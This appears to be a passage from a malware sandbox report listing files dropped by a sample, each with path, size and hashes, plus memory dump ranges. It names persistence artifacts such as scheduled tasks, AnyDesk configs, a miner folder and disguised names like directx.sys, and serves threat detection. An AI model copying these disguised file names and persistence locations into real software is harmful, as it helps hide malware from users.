
Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\setup.exe

Filesize
146KB

MD5
578b99fc6beb29265631e1dffe80a719

SHA1
a7521f4d84fb51586e6728c3b22eb82242040849

SHA256
33f01b338b4e0492a81dc68e12f177a6717910f3789f30edaf9ed946d6b8e0ff

SHA512
b169356c4079782839b2127830406f484d698800fb6ddcf226c55b89f212f4c91b066a20f023909aef41d2c784ccfd2e266ab0171fec1454d0d0a5d691c815c3

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\swizzy.exe

Filesize
499KB

MD5
5161d6c2af56a358e4d00d3d50b3cafb

SHA1
0c506ae0b84539524ba32551f2f297340692c72a

SHA256
7aa5344aab15b3fb2355c59e09b7071a6a0a12ec1a5828367ecb7e9f926fe765

SHA512
c981aafb0e901838b1ccacda32f9b026995d5fd8cbed6590f2b3dd1178a2751065194a872c22cf24475eaf963c464916e33dd0fc620723d79b7f25d0e5041441

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\time2time.exe

Filesize
380KB

MD5
fe665d942986f9e9de5d8cae9ec3dae0

SHA1
192b38312c2e28604abc343d5406e13e1ba4cff0

SHA256
cba2a72c3537cca446bf22df0b670fe6cefd0126547bedee450e3f4c31e52ab0

SHA512
1dfe804be315985eb2f5943cff89382f05bb61cc5dfa4802fde81f8a366b2f1784fa838ff6f38ef7e35f8511e946902e893a29b7bd6138b9c34018d48febf531

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\twapcdhuj20shds2WOP90sdhy.exe

Filesize
1.0MB

MD5
49771fd313935046468ff48e9a97f287

SHA1
f50093c7f55a2c413ef0c853ee4418877f0bc851

SHA256
e8e6da55699185b283b2b263a21db9a0a457a4b623ff668fdedbe7fcdb2d91d0

SHA512
1a5510d8ae56cd6a8de566ad04e9d4b3abe0380ffda545a49f31f97353e4f390a5bc351376ab61c52e0eed91f3df141378cd543ec605578b807ff5df46aedd81

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\vi.exe

Filesize
205KB

MD5
baa9e1a92bab85279dca0aed641f1fa9

SHA1
e26721107dce1355b8ecc71b457543b25ceab823

SHA256
d649524fba7b0571351c386359e13228781700def5904eed2c2455e15b2afd66

SHA512
f0f4d1ac701be8ee45b60f2a11d8831b8f53da73a55eeaed08b76cf0b544fc89ae515c5cf8082d67d94c4437b5b4337c6d9f501a25fd45bb3064a00fe0150e80

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\w.exe

Filesize
3.6MB

MD5
14546e0d876d521f78e6464a33436a28

SHA1
e94bcffde8fc921d1c27f5b91d8fae88a294e275

SHA256
0095ed212f431f27183cc0f664bdd0c90502d0d6ea3ade3a7bbb5c91616b1ed5

SHA512
f473b15924aec88841356b09613efd9957c00694459da527d0e08e0322d7d9412e2fb54f6a9907ecdc2cc37d0753bed40c0840e1f81884cb2085dd3d6d47f213

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\xcdaxfszx.exe

Filesize
443KB

MD5
aaa77d6928d24c74d686805fba1929a7

SHA1
42018920024096e5e8c2d2b70687c845502dd766

SHA256
3518948a80bee71bfb519041ae6f0e84f7656d222ebcd21f04416554af591d40

SHA512
41adaccabc42989372d64e953ee15579362227c0c71e6357e70defe240ebc6f75a7271d8644ce39606b6c61bd85e109d1df8fc8929c56ab32d311f60dd5208d4

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\yar.exe

Filesize
192KB

MD5
9e8baf127b832943d4fae218ce90191a

SHA1
449e6f1c2c79cb0ee4d43151bcaa6ecfd38efa70

SHA256
fbbb58d64ed3d52ebf0c4442588f4a19e48fd64023188fb750926b13c40df8a0

SHA512
9af9e3e30c34ecad41277c0bb8e27eabaf7fa05249153ffac20262af4ed3680a5a85cc5c192b04b3da3835396ef68e4e4a8b9123c663d8cf2f3a8681db7f8114

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\zardsystemschange.exe

Filesize
7.9MB

MD5
414d550d9c7fed5b71913ed7e4dd967b

SHA1
54e2587ae7b0911bce614baff9c3c143eb8565b9

SHA256
8537ddcdf90cfb74ec563ce669da68cb0c48bf1e9a47461dce1f9f87d8b1468c

SHA512
df1a34db483480e946e12804d01aa1157ddb03cb784ec4d701ec90454a130326e1cff88ba81e08f656fc2c3b3e06d2341b2db77fdddc104941939ed668d32324

Download Submit
C:\Users\Admin\AppData\Local\Temp\ISetup4.exe

Filesize
464KB

MD5
44f814be76122897ef325f8938f8e4cf

SHA1
5f338e940d1ee1fa89523d13a0b289912e396d23

SHA256
2899d533753918409ab910b70ba92f8740f76c8e8ac74f4c890e53b258e3bff6

SHA512
daeb1a81dd4fe1578502d0c681c7e723273d06297c2fad7aeb74b1a06cd05f72a418af9571c82188525af329b3fef9785d588f1416d6ccf45ab58b589d8f0d79

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\SysWOW64T\slwga.dll

Filesize
14KB

MD5
788a402d0fcc43662ba8b73c85c63c7f

SHA1
d5cec0d57a7516db6cdecbdc3d335db24444037b

SHA256
79950cff432a65ddf605b7194ded9529849108f6f3e0f6a44541d0f1f90e0f60

SHA512
8c52d8cf92429314942cd198e8aeec0b9d8f5b93e6545993eb69f6c00e59dbff29e83c6a65ef31e7faa5ef60965d7bf075846d4b6b88880b4afe14957620213e

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\SysWOW64T\sppwmi.dll

Filesize
116KB

MD5
bad4c7c3c11d8bd6b7f81887cb3cac5f

SHA1
80e23c13e67e6af29a2deb31a643148e69887c53

SHA256
a409caf11abd17ca932c2e6269e0f024cc781aa6ae9d56ba94a367b6239422b4

SHA512
27864f4f206661e427d371df93a15d7e818ff45fc3a7c10005f7e260b7106dc77a8437411f2c2d2d935b481771975ad354d051b3c1ae2ab5b010ea3d8b89a8b8

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\SysWOW64T\winver.dll

Filesize
12KB

MD5
161a5f076af5f6268665ebbcf53a4937

SHA1
1cab495c456d4d7dfc936a13b800884af8554704

SHA256
62977bb66738ef09910c2e30c5e09cf462a82144b4ad91f0ad42a83b2f994f55

SHA512
ed96a0b384bb97e33159bc7f0c51146a338645fd678c6d399620d665b26e17413f1290a9d2698b38c6d10e66d39958c31e5deb5fb4a471ab4f7eff4df5111b35

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX2\jergs.exe

Filesize
16KB

MD5
c661a77c31f83c413a96b5537ad31989

SHA1
8a5a47e39a9efa9dc4de447d2ae4cd5e375e3557

SHA256
cc5bb638cb34cbd386a906b7708eb62e05e3fc991a20bd060e1d84f722d29ff1

SHA512
b86e45d36d8566b51f932f660ee9c3d79cea1a2eb34a9f7da7b2ccc5e50c74f319e8005e43d719c5722ec148ddddf1351a7f9edc430888e572b3884d1610b1aa

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX2\world.exe

Filesize
5.9MB

MD5
c66eb6da8fceb3a18f78c876c7f40254

SHA1
d7b98af69a7b6bcb6b19efda5d723e4dc8deb616

SHA256
df536e56f4a4e29acbf540ee439f9a28b59cdc2d4d231574b447556d71b18d9f

SHA512
7e03d75ac4c1bdb570ba4e4bc4d4bbb99c3acf53ef0fc367807cb3103afbf5db038cc12de78256faa4c97636461e652c114c50ca0f6b421002ff1846a85ff01e

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX3\korawe.exe

Filesize
5.5MB

MD5
61a5740863c83d43ab6653a3b25b43e3

SHA1
b8a556f369094bbb4c9bead32bd13fc40ace089d

SHA256
21d14c33230d49e7b5b11b0959e3f053b1fb90ecb23e3cc8c06c8b44a47ceae3

SHA512
6c4c7b752d677f21647dd43133b5a10b6c2dcbf04adb26f7dc82b6eb669d1a4d099e6be7f85d1b2cb6aab136837b72e486d7059c083690ff633e52f41a18f87c

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_coxpdd1r.ois.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\gcapi.dll

Filesize
385KB

MD5
1ce7d5a1566c8c449d0f6772a8c27900

SHA1
60854185f6338e1bfc7497fd41aa44c5c00d8f85

SHA256
73170761d6776c0debacfbbc61b6988cb8270a20174bf5c049768a264bb8ffaf

SHA512
7e3411be8614170ae91db1626c452997dc6db663d79130872a124af982ee1d457cefba00abd7f5269adce3052403be31238aecc3934c7379d224cb792d519753

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsd1D53.tmp\inetc.dll

Filesize
21KB

MD5
d7a3fa6a6c738b4a3c40d5602af20b08

SHA1
34fc75d97f640609cb6cadb001da2cb2c0b3538a

SHA256
67eff17c53a78c8ec9a28f392b9bb93df3e74f96f6ecd87a333a482c36546b3e

SHA512
75cf123448567806be5f852ebf70f398da881e89994b82442a1f4bc6799894e799f979f5ab1cc9ba12617e48620e6c34f71e23259da498da37354e5fd3c0f934

Download Submit
C:\Users\Admin\AppData\Local\Temp\s.exe

Filesize
3.3MB

MD5
f66698ba45958fc9a2889d04fcd6ee4d

SHA1
2ecdf77e42160fef2455373206b2d5f0cafb1fe4

SHA256
f00dabc4f5c3bee757784c8ba272b2742cff9499951bcced36cdd8f93a86d328

SHA512
d9a90f1cc242875807aa2ed5f709bb0cf63560e8e818982f740fa977d1f026e15387d34cd03aa602892ac28f30fb047c8e67d4f7b0e4c5da6e273bd96f2ba77e

Download Submit
C:\Users\Admin\AppData\Local\Temp\tftp.exe

Filesize
95KB

MD5
461ed9a62b59cf0436ab6cee3c60fe85

SHA1
3f41a2796cc993a1d2196d1973f2cd1990a8c505

SHA256
40fe74d3a1116ed8ca64c62feb694327a414059eeaef62c28bc5917e2e991b3d

SHA512
5f6f7528a05175cc1b8d927feaba56a90c70e8fe42c7ea01999cf328d28b8596de0df8d6d3fbc6e4fe5d89e36982871a59493dcb8d633fb942a35a217e4aedef

Download Submit
C:\Users\Admin\AppData\Local\Temp\yocklfkvyhvxy

Filesize
884B

MD5
47bfbccf91e9fd34fe790a97db9d48fa

SHA1
ac059c594f8aa073c76ad7a4f6d30542f210c470

SHA256
8281ed8dca0d6e375569a703e19c4a71412d27a623cb5d3e63908eca09dc0a5e

SHA512
524fada0b3f0ec4a734c2090532dd4bf2b5c8467fbeb1496587cdb6a670d44ff12815f8359cd79cc1d35c38f4fc7f3cdc44d70dd6cfd71f43eceb0099edb1df6

Download Submit
C:\Users\Admin\AppData\Local\Temp\{89FC691C-9683-420e-B3CF-592AF0BAF959}.tmp\360P2SP.dll

Filesize
824KB

MD5
fc1796add9491ee757e74e65cedd6ae7

SHA1
603e87ab8cb45f62ecc7a9ef52d5dedd261ea812

SHA256
bf1b96f5b56be51e24d6314bc7ec25f1bdba2435f4dfc5be87de164fe5de9e60

SHA512
8fa2e4ff5cbc05034051261c778fec1f998ceb2d5e8dea16b26b91056a989fdc58f33767687b393f32a5aff7c2b8d6df300b386f608abd0ad193068aa9251e0d

Download Submit
C:\Users\Admin\AppData\Local\Temp\{EE23282A-6421-48f6-B0F4-B640F9A92B76}.tmp

Filesize
3KB

MD5
b1ddd3b1895d9a3013b843b3702ac2bd

SHA1
71349f5c577a3ae8acb5fbce27b18a203bf04ede

SHA256
46cda5ad256bf373f5ed0b2a20efa5275c1ffd96864c33f3727e76a3973f4b3c

SHA512
93e6c10c4a8465bc2e58f4c7eb300860186ddc5734599bcdad130ff9c8fd324443045eac54bbc667b058ac1fa271e5b7645320c6e3fc2f28cc5f824096830de1

Download Submit
C:\Users\Admin\AppData\Roaming\AnyDesk\system.conf

Filesize
424B

MD5
3c8c17200c19e30ba161c03e10c3dc82

SHA1
54c653fbc7868887c18f9e648083830e2f5b0910

SHA256
d8ecb9fd82926f6a93aeb299b6a1b71992f1ea93aa9c149584434fbc50e534db

SHA512
82d9b82d66c70c8655f2d55d1cea4d470c20fa46dbd7505469955c60b0784f81f1b8af4f0007cb21d7161f342369886291093ef3560965c846c2db16eb89794d

Download Submit
C:\Users\Admin\AppData\Roaming\AnyDesk\system.conf

Filesize
669B

MD5
6b95225fbbd5cecc081681dff9c5f92c

SHA1
7a74df27a037239bc3b8beab1bf5d16b9f76adfe

SHA256
b02350c3e699b580588ea8aebd0a838cd8980d717f73a1f28542aac9562b0400

SHA512
914c8031ce936d041e1f7f837ce050a4c580082d89360174ac82908dcade651a1d53c1ce3d4822c3a868b485645a52b7af40270d9727df664d9b3976dac2b13f

Download Submit
C:\Users\Admin\AppData\Roaming\AnyDesk\user.conf

Filesize
1KB

MD5
6fc9b1273d65f0d8742ded12ca38a52c

SHA1
b474635a052cd7d774f40f456c3a7dbe63f270bb

SHA256
86f099b1a423691ab8d0781af506b13e2db554f32008af6a725b77d73b4a45ac

SHA512
74b48ebeb19507014f1fce83a2d7443854c81212fee0a69a6c557c5f4f0be69f93ee3d2ef0e9e7616b69b34282f5acaeb351f674ff79be08d8ff771d9be163a9

Download Submit
C:\Users\Admin\AppData\Roaming\AnyDesk\user.conf

Filesize
1KB

MD5
84789757e7d2583417446871d11ea109

SHA1
b6a902f921cfbfd3af4efa52ff48b868e3c94217

SHA256
fe380f1b9bd8a0b66a6887cb681a87631e83f7ae0990141d4597afd964bcfa2f

SHA512
fdd7dbee2ff31078d6629f3a9fa1666677c717a3604ec90975e7db0ca388f6cc0910e194a65a3503c24b46ee1fcb17c062de9ba567151cfbe6d7b894ac450320

Download Submit
C:\Users\Admin\AppData\Roaming\AnyDesk\user.conf

Filesize
6KB

MD5
5af5b5d649da04b70bbd8d6fe56ba03a

SHA1
1904ed4a982fb274e230b958d7f069a7c5040672

SHA256
ea42a6281f6228c29a7e72f68e7e3959c56e18d4381b5b77b946d5c53d277197

SHA512
09febd6463ff4297d0ce14dede3f81d9438bfd90de513f6ba3307db2c1571d18f86d07da5cdb491978e6cd787a534052fc88d458f0d6bcb8ef06780bad86bbd6

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1276817940-128734381-631578427-1000\0f5007522459c86e95ffcc62f32308f1_9695922d-b631-4b92-9dfb-6ec7ee5c3693

Filesize
46B

MD5
d898504a722bff1524134c6ab6a5eaa5

SHA1
e0fdc90c2ca2a0219c99d2758e68c18875a3e11e

SHA256
878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9

SHA512
26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\5f7b5f1e01b83767.automaticDestinations-ms

Filesize
7KB

MD5
fd7c17ae8aad973022b64553f9bcd71a

SHA1
2cb23fddb5635efdb7016c3fd160ea27bb796672

SHA256
cf7984f350ca2586d04cb0ce2371d17e79c775ba10120f7953f8292c08d4f7a9

SHA512
cb9fee9e3ab611a6a947c6457fd2ae8da1c03a220aa82f08f51fadd604569f395da30482fb36180032ea9dcf9dcd75f904f4fbbc299f233ce618579fe0ce2cd1

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
6KB

MD5
2987bc6005d9fd18a15eb136237ed2dd

SHA1
d22299124e26a808674d216801165ccdcd0ba819

SHA256
187036bd6aa8068bd2e7d092e79135783ff639abf7f7f2c53df08cef64b81bdf

SHA512
d81a3d546ba1850682714a6c13703730818ecca4c8872f42141afe51f8f5490109bd10db41d423b618d60ba3c15216ed9dbcb4f95c3631d7e403de6d318718b3

Download Submit
C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe:P

Filesize
20B

MD5
57d6a48d6c9662ac864de0d1dd72b817

SHA1
21ed38c2db149a74c62471742ea86713cde6f964

SHA256
27887f9d869d9ea998f4dc50879da686e824c73c39c7b65930da9df2111aa7fd

SHA512
7e35f5665a6b3eaf626c51bd70d5eb9032c2e86be1a4e382575c72035cb0877fe05bc793c5510309b877e46c9c16191db39085f4eac7de2cbf4d15bab006d2f6

Download Submit
C:\Users\Admin\AppData\Roaming\Updatesystem.exe

Filesize
128KB

MD5
d6b82f7d78ab802f7b244c2b841755d3

SHA1
78fa3dd055dc350e2faed0a5e840545fece1dfd9

SHA256
e9f28544b1ec1cbae564f0924787ffe518ce6539ef659a2bd987af628bc818e7

SHA512
a737c02e58ee64d1872b4798ef0cae0b08b98185cc4b1abbcb7251d2cc06febb4867494c6bc352ea643ce6cc61f628f90b2a4fa3e7b899740f695d69e57677bc

Download Submit
C:\Users\Admin\AppData\Roaming\d3d9.dll

Filesize
461KB

MD5
8862a762ad6792ad57fe0f77c9224bd1

SHA1
85a443a0c92e5b1b87ae2ccb981445eb67b43b88

SHA256
b49920e93933a0a11f90600b2f218550c3bb8399c8afb369597ba9602f1a6825

SHA512
3ed9068077d265cc66d0241d7cc9c6f67b1958aace8d25fcb4d57060172d51f8f4eadb701ebe620de98654674b91f9f0973370a236e7a71ed40dca708d959e5f

Download Submit
C:\Users\Admin\Pictures\uuyGNRMPnBFGKqjwUhLZxzuT.exe

Filesize
7KB

MD5
77f762f953163d7639dff697104e1470

SHA1
ade9fff9ffc2d587d50c636c28e4cd8dd99548d3

SHA256
d9e15bb8027ff52d6d8d4e294c0d690f4bbf9ef3abc6001f69dcf08896fbd4ea

SHA512
d9041d02aaca5f06a0f82111486df1d58df3be7f42778c127ccc53b2e1804c57b42b263cc607d70e5240518280c7078e066c07dec2ea32ec13fb86aa0d4cb499

Download Submit
C:\Windows\System32\Tasks\UAC

Filesize
2KB

MD5
70b5c01340c23a116b5610704317465b

SHA1
0f45f121c83d4bd60dfd7ec5cbc264b2461baa52

SHA256
5074e8d0f48ea7fc4dccbb6cc3a9ab3f2f92d4648fd247f87158f88a677b3993

SHA512
b924fed502b2d92dbf513eedd68800bf48711db316f101098619cc22773fd873a194e23f0c0cb7442828d190ae2b3dd0ac12720c7700b60943adc3c757d15a58

Download Submit
C:\Windows\System32\Tasks\explorti

Filesize
2KB

MD5
d6b28ddd7c4e371b40af13eed1873476

SHA1
6303342d44fd1515d155ee1771720b85f324d5a2

SHA256
2c5b5acae3e80bf6874497aadc6eeaaa84d93d9da206c258e16a00ba9da51bd7

SHA512
fde0c7fa5e3f7649e626a12167c341cf7bf7eadc028a14cf2bfa1e22179ed306e9d2174ca2e241cc307a550fa1e4941a64d18e35b8b19282d2079ea96727b12e

Download Submit
C:\Windows\System32\Tasks\explorti

Filesize
2KB

MD5
c7f9a3c87cb0c6a3076bff5ee43d1813

SHA1
f58f8f06a0965450410e4936e77024878df4751e

SHA256
b837ce2c8b3024009d2df5567619f77df68f39b25a70d153e5cc6d365a558b09

SHA512
b0c1fa6bdee20e87b10f9c99fd0a0481e744b65d8defa467078b98dc6d8a9d48dafc84170b1af44b31f2355a2873d30a904b940ea3dbd487f4d583ea40cbd0a9

Download Submit
C:\Windows\System32\Tasks\jxfk

Filesize
3KB

MD5
e98b2264b781f02284cc8c1dd85e54bb

SHA1
9131039381249a2e9bf303e57b0d87bf29f20187

SHA256
669f78883770f6fee4e6736a85ab05dfb320c3e945c2e412534ff0ac72ca7e0e

SHA512
8b35b864d07913c19ec377c90e61e432cfd85c60347f2fd56214e67865fc6c5a4879e513a3ebdb7a43f5faca9b0c1031feb15793847ddcf97c8af53a84eabac9

Download Submit
C:\Windows\directx.sys

Filesize
48B

MD5
ff8d5172014fb2acfbcbe42265b0dcb3

SHA1
453b99e2e72efe02182404886a7be529bd1b8857

SHA256
be6d9be08233800e86d0f0bb84daad17395fb371a27618b0619b2c6c821a14c4

SHA512
45d17a0234ed6aedf9098d7d0168b0ecc9e0fe79de033f97bc1511cd348cec71fdab3571333a9f693604d1e79a750a03c98542c120624824683ac209f9e87227

Download Submit
C:\Windows\directx.sys

Filesize
47B

MD5
dfc1b358c17c3306fa0de8dffb312abf

SHA1
66000340253923a7322a79e448c7eaf032ea9bec

SHA256
18f89c39d2dc0cb6f8f1abb7f52520981fb6532dd675bb0bd3e517ef8777cfcf

SHA512
5620da9cc079cbca1b2785cc9e3b810bd276b62b5d84a8e0ed19900a10438b7634f5a1a793a27e0cd4d005945712b4cf7a709213ec0b6f7361e083e4b82378aa

Download Submit
C:\Windows\directx.sys

Filesize
57B

MD5
a8192623d645da9000e4f3a568195aed

SHA1
066e9abebc3a04f00b22241fb6f04bffd2f20db6

SHA256
2f4eedde33b87748b3d83803f75fd162efbcdb56f9f3650afb99a4b219c474df

SHA512
a9ce0e7fb3d91a70726ae7d8dc84bf6dfa9a18477929be568c00eb671a6c99dc639d35be4cd263bcbf173096f0b0466a61b355da8ec900a3534c0f146af675eb

Download Submit
C:\Windows\directx.sys

Filesize
54B

MD5
c16baa5b70a8b90210b5783e7a66505c

SHA1
14319d6f048e341ab8aaf50c22c966549a35ecd2

SHA256
d3490fafccf94112786febcca3d9455079af94d8fa0199f74310587bfe5f545a

SHA512
d21b10a524f3040ac064464f0ec4fa4de8306b286afdc0949d9f456e14d67ef88595411392c8469dbd9ea8e1f41182680423d7ce4a71f74705a628b5546fa6dc

Download Submit
C:\Windows\directx.sys

Filesize
51B

MD5
172b811b9dc7aa8b08a872adccda7893

SHA1
ae287d984411268bc7ccf5d5c556ffbd46a248a5

SHA256
b555d6ac1f66c7f4f118c5605e8149f400545da3f62966696d7d712e43a6d8cf

SHA512
e313816ae44b5eec21370dd137f6b18fc69b479a56f473879a5c0207df1f7b6fa629f654ab6bea0fd805aeff65dbaeed30e09d7410c28f007e22a1cf0c4bd1c0

Download Submit
C:\Windows\directx.sys

Filesize
54B

MD5
2159671a91432ef850dacca49e48113d

SHA1
e369493fd1ca68376d67ca8e40003f6ee968acb3

SHA256
1205414cc12df5ab0b141524d1c9d04b158609d9cc2f7613c5f58720bf1eef7c

SHA512
2eb4b6f40d8b36577a1d439a6588f2284dc71d0e8dcc4266efdbe8ae2310e914f6ff5af20644735e3a637c63143b7000fd39a50c9612c0e8107af8ec72037c3e

Download Submit
C:\Windows\directx.sys

Filesize
59B

MD5
9e06cbaea528ed37c8d88cb88a27a9ff

SHA1
8c6863473edbbe39d692ede22a57d09076bd40e1

SHA256
fb23916ef2ef95cabf567d35d79de3209bd357967bbe1aac618b684d06f4ad36

SHA512
b9ea6e2ef1e35be7ee1e2782452ff4419787792299b30cfd7adf9b37dc6d92d3e6ec36040e6320822e405c7fafe7f79d05975b8430af113041d1726a9bf90754

Download Submit
C:\Windows\directx.sys

Filesize
78B

MD5
dd02cd1c940ea03f1efa47282e595329

SHA1
2666fc1155461e1db694217b7fa3e1d871618eb6

SHA256
5da7fd7d20e56e956536b19b474ce67ea36d473fa31a36ed5189be367d12d924

SHA512
c8fe29d87ee5ea7bb12b0ebc375182a76997ac52dfb86b07f20709279e5122fb5776434049b8a85cc6c2de81c4c79ff6c10f505a672fbf96a53d75a9f8b80f86

Download Submit
C:\Windows\directx.sys

Filesize
81B

MD5
18ba349c950ca2f58c27d167aac6b94f

SHA1
b3d9d8ebff3d3f28ca8ee08ff351272ef650b68f

SHA256
69298beb43d8dcd31a0863d7e98f9673a4b813ed4c52df6f6d23c7f867d0a152

SHA512
4ddf3d0a83cae0e0aa7efff19db10f8d9005d899ea2c9d9b7a5e4c3b549c30b14bff6ee6c27e8d27270a62d502c70a26745f96e038752e4577487d600df63590

Download Submit
C:\Windows\directx.sys

Filesize
78B

MD5
3a910ec0ffcfe61644ecc306861d340e

SHA1
da510f5ec06b82b56c009b82c13610d8bbf63cd5

SHA256
70466a470f19f2c6c4184c676b62a7b7e521a1ce0a087ceb6d03c8f58487d0db

SHA512
0fea600ddfb347295bb9635ccfe8b16e937af0877e1ccb7a59b081b48428f7f662bd86358fd6d99d5539f20c01209c63c957e7ac0dc8823b496e4dac953e6328

Download Submit
C:\Windows\directx.sys

Filesize
78B

MD5
5d86ce20ee58e80a3e315f02e281ee06

SHA1
8a435ef5ca552350fb2fd063eb04df5a44b7bc00

SHA256
f12bb81130661dd7abf9906475a10bd39af6fe8eb0658dec4c00fbf6e6dd1255

SHA512
d34d60a37359cad3d8ec105e2c82d35c013f6f23d3a10557375bad4f4aa3935f17ce6e16dc3a28a4a3cf8491b4438fdce56c6362b3743d779e13e4232a04a39b

Download Submit
C:\Windows\directx.sys

Filesize
78B

MD5
151929069db4a25d3735a9ee22664e03

SHA1
222c4dde8d64d5af28d0dd96f6d799470653f234

SHA256
d8f541b5aff70b9252ddfb427c76083be5ac780e77dd42eb74e8ccb26a08394b

SHA512
036921109736c680a9002a359fb0afea92aadcba6338c6c13d9c9b303d9f130b21e2edc229a070fd7644efd06b897e735fda7b5a700a7526778cf82225c3fcad

Download Submit
C:\Windows\directx.sys

Filesize
81B

MD5
ddc8c8bc982cd7d4ebe99e636d5f5009

SHA1
a1a0220bcf2f23f9a2d004166e34ce8213b6da87

SHA256
bc0a4915358f7d9b624ee6214511374bb72932e0e0a1828fffe95919ce022f4d

SHA512
4538640fdb8e1d0b7814ae0c3b1a585bec574844c133727233db789657ba5151d5b30dd3935abbd11bfb9abee7ca53ba9db426445a8fc84740f879db9a5c1fa4

Download Submit
C:\Windows\directx.sys

Filesize
74B

MD5
8ff34cdeed6cc8ab3d6752cf55af9c3d

SHA1
e07afae46791004cb0d01e4a9085b80c613ec2a6

SHA256
fa6f0523daae346ae0c358f07345d7e8d413840531af9ac57524a0fb693d0fc1

SHA512
24f857714a812d74462b636417756d137999a28036768ecf9d8c3838bbe88f32548342562b5718718c717de80a5df876284c5b31ed8172f07cb230916606aebb

Download Submit
C:\Windows\directx.sys

Filesize
114B

MD5
66e3e89ec00b33fd679be20f78f7247e

SHA1
141d19d7c63089e9b5ca38b42501f41d98250a30

SHA256
a285e9359481cc4010abdce3c8666ea82e261b307639db67fe85d1231f0b7497

SHA512
b90b63d6e4e6a59149bd40a51167c7c6dd84218261c1f30129bfa6ebca9f35dbc0bed17f6dd4943fd9a2dbc8dd5ca5aeeaf05b1b52ee335dbf8a04816a85bced

Download Submit
C:\Windows\sysmablsvr.exe

Filesize
88KB

MD5
4505daf4c08fc8e8e1380911e98588aa

SHA1
d990eb1b2ccbb71c878944be37923b1ebd17bc72

SHA256
a2139600c569365149894405d411ea1401bafc8c7e8af1983d046cf087269c40

SHA512
bb57d11150086c3c61f9a8fdd2511e3e780a24362183a6b833f44484238451f23b74b244262009f38a8baa7254d07dfdd9d4209efcf426dfd4e651c47f2f8cec

Download Submit
memory/560-196-0x0000000005E40000-0x0000000005F2C000-memory.dmp

Filesize
944KB

Download
memory/560-197-0x0000000005B40000-0x0000000005B5C000-memory.dmp

Filesize
112KB

Download
memory/560-195-0x0000000005D30000-0x0000000005E36000-memory.dmp

Filesize
1.0MB

Download
memory/560-194-0x0000000000EF0000-0x000000000128C000-memory.dmp

Filesize
3.6MB

Download
memory/1004-684-0x0000000000400000-0x0000000000450000-memory.dmp

Filesize
320KB

Download
memory/1004-800-0x0000000008B10000-0x0000000008B60000-memory.dmp

Filesize
320KB

Download
memory/1004-771-0x0000000008940000-0x0000000008B02000-memory.dmp

Filesize
1.8MB

Download
memory/1004-799-0x0000000009040000-0x000000000956C000-memory.dmp

Filesize
5.2MB

Download
memory/1104-177-0x0000000008140000-0x000000000824A000-memory.dmp

Filesize
1.0MB

Download
memory/1104-178-0x0000000008080000-0x0000000008092000-memory.dmp

Filesize
72KB

Download
memory/1104-174-0x0000000000400000-0x000000000045A000-memory.dmp

Filesize
360KB

Download
memory/1104-176-0x00000000085F0000-0x0000000008C08000-memory.dmp

Filesize
6.1MB

Download
memory/1104-179-0x00000000080E0000-0x000000000811C000-memory.dmp

Filesize
240KB

Download
memory/1104-180-0x0000000008250000-0x000000000829C000-memory.dmp

Filesize
304KB

Download
memory/1356-870-0x0000000000400000-0x000000000043C000-memory.dmp

Filesize
240KB

Download
memory/1448-548-0x00000000000B0000-0x000000000054A000-memory.dmp

Filesize
4.6MB

Download
memory/1448-546-0x00000000000B0000-0x000000000054A000-memory.dmp

Filesize
4.6MB

Download
memory/1636-701-0x0000000000B60000-0x0000000000BB0000-memory.dmp

Filesize
320KB

Download
memory/1916-815-0x00000000000E0000-0x000000000064C000-memory.dmp

Filesize
5.4MB

Download
memory/1916-2148-0x0000000006F00000-0x00000000072E0000-memory.dmp

Filesize
3.9MB

Download
memory/2044-2487-0x0000000005440000-0x0000000005476000-memory.dmp

Filesize
216KB

Download
memory/2044-2492-0x0000000005BD0000-0x00000000061FA000-memory.dmp

Filesize
6.2MB

Download
memory/2044-2680-0x0000000006290000-0x00000000062B2000-memory.dmp

Filesize
136KB

Download
memory/2044-2737-0x0000000006910000-0x000000000692E000-memory.dmp

Filesize
120KB

Download
memory/2044-2685-0x00000000065B0000-0x0000000006907000-memory.dmp

Filesize
3.3MB

Download
memory/2044-2684-0x0000000006440000-0x00000000064A6000-memory.dmp

Filesize
408KB

Download
memory/2424-2334-0x0000000000400000-0x00000000004D4000-memory.dmp

Filesize
848KB

Download
memory/2452-26-0x00000000004D0000-0x0000000000E34000-memory.dmp

Filesize
9.4MB

Download
memory/2452-70-0x00000000004D0000-0x0000000000E34000-memory.dmp

Filesize
9.4MB

Download
memory/2452-49-0x0000000005CD0000-0x0000000005D36000-memory.dmp

Filesize
408KB

Download
memory/2452-46-0x00000000004D0000-0x0000000000E34000-memory.dmp

Filesize
9.4MB

Download
